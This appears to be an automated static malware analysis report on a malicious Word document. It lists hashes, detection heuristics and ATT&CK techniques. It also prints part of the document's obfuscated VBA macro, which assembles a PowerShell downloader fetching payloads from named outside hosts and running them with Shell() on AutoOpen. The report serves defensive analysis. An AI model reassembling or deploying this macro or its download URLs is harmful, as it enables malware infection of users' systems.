Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9ce27e2c4198d72d…

MALICIOUS

Office (OLE)

191.5 KB Created: 2017-12-26 21:40:00 Authoring application: Microsoft Office Word First seen: 2018-01-08
MD5: 234e788b52e73b9db9040a0fb3159458 SHA-1: cf218a8921a4936fb9042d4f9022878a800d2c4e SHA-256: 9ce27e2c4198d72d91d53eb790f6be33c91ffefb925dafce4f41a6f64fd9c4d1
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses the Shell() function to execute a downloaded payload from the reconstructed URL "http://blog.siplik.com/vTW5jY/pXIAhVNF". The presence of the Shell() call and the embedded URL strongly indicate a downloader or droppper functionality.

Heuristics 7

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 74317 bytes
SHA-256: 82de7429ce70a6f9cfbbc822bce8bfbcdf8829b69e6a6dee877e2a0059d062e0
Detection
ClamAV: Doc.Trojan.Obfuscated-6443078-0
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AqkATsDs"
Function GFUXzrWdafKF()
On Error Resume Next
whlMibJQ = 44224474 / IjNoqdzbWAN - 536083786 + CSng(lwpsDRNawui) + 2 - Chr(7013) - qzScOXP / 8527 * VboGMuXkaGoI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(BpimrYmr)
hzdGUvi = 44224474 / cIjdYPPdFBOkh - 536083786 + CSng(KNXnHQdCZVUDn) + 2 - Chr(7013) - viRmjbAhEoaSZ / 8527 * DzzTqMEwpZiOOZ + Fix(7798) + 9905 * Sin(7) / 310 * Sin(KJUcahbjcDFq)
luihUl = Mid("Gw1fkwI0Y9YqQLmvzvltftUuFBXGa+JIq= JIq+JIqzJIq+JIqTJIq+JTmi+TmiIq3ns'+'J2jdMm", 30, 43)
ndLfBF = 44224474 / iOEHwrKWN - 536083786 + CSng(kbEJKijJucArFW) + 2 - Chr(7013) - oKjqXwdtFzZBEw / 8527 * ZDtpYjwfXDK + Fix(7798) + 9905 * Sin(7) / 310 * Sin(rPPmIiJJh)
vizVdtJtPb = 44224474 / UDICVNjaQ - 536083786 + CSng(awcfTuM) + 2 - Chr(7013) - QcjJSYVYiDW / 8527 * kdXWzupPRICbMI + Fix(7798) + 9905 * Sin(7) / 310 * Sin(sPFXWpocBkLlj)
XzljljTvpJT = 44224474 / jqAGizMlhbN - 536083786 + CSng(CzwQzRsfM) + 2 - Chr(7013) - MjmiqKQTvmww / 8527 * CoRwzSmWjC + Fix(7798) + 9905 * Sin(7) / 310 * Sin(MRorkrQCOti)
IIuYBIs = Mid("K5Ha7E5ZUKdd3NFl84GwVD8q+'+'JIqhtJIq+JIqtpsJ'+'Tmi+TmiIq+JIq://JIq+JIqblogJIq+JIq.siplikJITmi+Tmiq+JIq.com/vTW'+'5JI'+'q+JIqjYJIq+JIq/pXIAhVNF", 24, 112)
oiIVGzSY = 44224474 / wfcEUTzYFiZF - 536083786 + CSng(IIaFwJhdJdfzFv) + 2 - Chr(7013) - VmmJFiU / 8527 * ZXsotTJXwQs + Fix(7798) + 9905 * Sin(7) / 310 * Sin(UbfObCDnCzE)
AOkYLrt = 44224474 / NYhziHEX - 536083786 + CSng(bErsJiwSi) + 2 - Chr(7013) - rTIMcomsiM / 8527 * bHiIcCBSwkjDjj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(WAiRRDT)
PZtPnKs = 44224474 / YzCTvPAOo - 536083786 + CSng(AhEVnJzFhiM) + 2 - Chr(7013) - fuGXiCfha / 8527 * SdQwRqbiQir + Fix(7798) + 9905 * Sin(7) / 310 * Sin(bwKFOtowPVBIR)
PjArj = Mid("iRuUftVZHKo][Tmi+cnvajP6zrBU9aZdW9DkqcRZK2O3", 12, 6)
OVzTIKj = 44224474 / apFLEJwOaKRA - 536083786 + CSng(NjjbwzmnHPYdbR) + 2 - Chr(7013) - NMvtHWETXqzI / 8527 * VJsSjEJQwpUDhw + Fix(7798) + 9905 * Sin(7) / 310 * Sin(ZjidsLANP)
FTsnc = 44224474 / azwCuLDsIUZ - 536083786 + CSng(GdivQrQUN) + 2 - Chr(7013) - zkEpMXicdXd / 8527 * lziSIOkObWLZh + Fix(7798) + 9905 * Sin(7) / 310 * Sin(oEGiBHS)
hnuvUjCIT = 44224474 / saIQIkzrmS - 536083786 + CSng(XGuWIUPWbpZalt) + 2 - Chr(7013) - ITQoVvduqiAAp / 8527 * UMviUCa + Fix(7798) + 9905 * Sin(7) / 310 * Sin(GkqkrnhSzXWSc)
CnvPEptjQ = Mid("ScBEpnCh8q+JIqc in zT3bcd){JIq+JIqt'+'ry{Tmi+'+'TmiJIq+JIqzT3francJIq+JIq.D'+'JIq+JIqownloJIq+JIqadFile'+'(zT'+'3abc.ToStrinJIqiL3pXSUfGlA9", 10, 118)
OrUhj = 44224474 / AMzEzfOfqCoRsh - 536083786 + CSng(zjBkzEaZ) + 2 - Chr(7013) - HIjZWwVVWqz / 8527 * VDPEzwjIlQ + Fix(7798) + 9905 * Sin(7) / 310 * Sin(HrIvAXTq)
vqSQTXvBUMO = 44224474 / oKUsAMHYZMYoTF - 536083786 + CSng(cVkEjjoHHhRrN) + 2 - Chr(7013) - AdnDtARzcKK / 8527 * IpBSfPahvkKPa + Fix(7798) + 9905 * Sin(7) / 310 * Sin(zDMKjUusZ)
LQVZTcVmrL = 44224474 / mSzqwoIrjS - 536083786 + CSng(BjqcjlfzHuQuqv) + 2 - Chr(7013) - hNDVwCAXjDG / 8527 * HKoocSVLXA + Fix(7798) + 9905 * Sin(7) / 310 * Sin(POrUifWXGvUH)
HwSzLzJw = Mid("IMzvBTMzY9zAmWu0zWldqn3TVLzItq80+['+'CHAr]73),[CHA'+'r]1'+'24 -cREpLACE ([CHAr]115+[CHAr]105+[CHAr]49'+'),[CHAr]36)) ').REPLace('Tmi',[STriNG][cHAR]39).REPLace('Pt2',[STriNG][cHAR]36) ) Iz5", 31, 156)
fLKid = 44224474 / kkZEXisaunYz - 536083786 + CSng(oBBRfjP) + 2 - Chr(7013) - XdiANkSbqw / 8527 * PTivpVKRs + Fix(7798) + 9905 * Sin(7) / 310 * Sin(VmpAwYIhDPJK)
rXPirCWKR = 44224474 / DujQFQG - 536083786 + CSng(fikSQiV) + 2 - Chr(7013) - EzktIjDuHXjpO / 8527 * YKXoNFrBj + Fix(7798) + 9905 * Sin(7) / 310 * Sin(rdldhjF)
sDbajvOOn = 44224474 / MHvEJtawD - 536083786 + CSng(JkmGGLvVRWjCq) + 2 - Chr(7013) - APMJtnjGEEVnu / 8527 * AYSlRzjQM + Fix(7798) + 9905 * Sin(7) / 310 * Sin(CWHtrnfKQ)
QaKhYE = Mid("FaLGq+JIq/,htJIq+Tmi+TmiJIT'+'mi+TmiqtJIq+JIqp:JIq+JIq//charlesdundaJI'+'q+JIqs.co.8J7nXjiHU58MIilakj1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.